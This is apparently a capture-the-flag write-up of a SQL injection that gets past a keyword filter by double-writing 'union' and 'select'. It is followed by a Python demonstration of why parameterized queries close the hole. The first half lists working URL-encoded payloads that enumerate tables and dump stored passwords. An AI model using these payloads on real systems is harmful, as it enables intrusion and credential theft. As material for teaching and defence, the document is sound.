The filter blocks union and select, so try bypassing it by double-writing the keywords (the filter strips each keyword once, so uniounionn collapses back to union after stripping).
Locate the injection point:
Determine the number of columns with order by:
/?q=1'%20order%20by%204%20%23
This confirms there are 3 columns.
Find which columns are echoed back:
/?q=1'%20uniounionn%20selecselectt%201,2,3%20%23
Get the database name:
/?q=1'%20uniounionn%20selecselectt%20database(),2,3%20%23
The database is level3.
Get the table names:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),2,3%20%23
The table is users.
Get the column names:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name='users'),2,3%20%23
Query the field:
/?q=1'%20uniounionn%20selecselectt%20(selecselectt%20group_concat(password)%20from%20users),2,3%20%23
This yields flag{45fe4da0bbdecf06c10b5b070c1fb9fd}
Alternatively:
/?q=1'uniunionon%20seleselectct%201,username,password%20from%20users%20%23
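To show why the double-write bypass works and what actually closes it, here is an added example (not code from the challenge or this write-up) of a constructed single-pass keyword filter beside a parameterized query; the filter, table and password value are assumptions, and SQLite's `--` comment stands in for the `#` used against the MySQL target above.

```python
import re
import sqlite3

# Constructed stand-in for the kind of single-pass keyword blacklist the
# write-up bypasses; the challenge's real filter code is not known.
BLOCKED = ("union", "select")

def strip_once(user_input: str) -> str:
    """Weak filter: remove each blocked keyword once, case-insensitively.
    'uniounionn' loses its inner 'union' and collapses back to 'union'."""
    for kw in BLOCKED:
        user_input = re.sub(kw, "", user_input, count=1, flags=re.IGNORECASE)
    return user_input

def strip_until_stable(user_input: str) -> str:
    """Repeat stripping until nothing changes. This closes the double-write
    trick but is still a blacklist: it mangles legitimate input and leaves
    the query built by string concatenation."""
    prev = None
    while prev != user_input:
        prev = user_input
        for kw in BLOCKED:
            user_input = re.sub(kw, "", user_input, flags=re.IGNORECASE)
    return user_input

def make_db() -> sqlite3.Connection:
    """In-memory SQLite table with one constructed row (sample data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return conn

def vulnerable_query(conn: sqlite3.Connection, q: str) -> list:
    """Filter, then concatenate: three selected columns, so a UNION with
    three values lands in the echoed positions exactly as in the write-up."""
    sql = f"SELECT id, username, password FROM users WHERE id = '{strip_once(q)}'"
    return conn.execute(sql).fetchall()

def safe_query(conn: sqlite3.Connection, q: str) -> list:
    """Parameterized query: q is bound as data and never parsed as SQL."""
    sql = "SELECT id, username, password FROM users WHERE id = ?"
    return conn.execute(sql, (q,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    # SQLite comments with '--' where the write-up's MySQL target used '#'.
    payload = "99' uniounionn selecselectt 1,username,password from users -- "
    print(vulnerable_query(db, payload))  # [(1, 'admin', 'constructed-secret')]
    print(safe_query(db, payload))        # []
```

The same input reaches both functions; only the concatenated query lets the reassembled keywords change the statement, and the iterate-until-stable filter is shown only to make the point that a better blacklist is still not the fix.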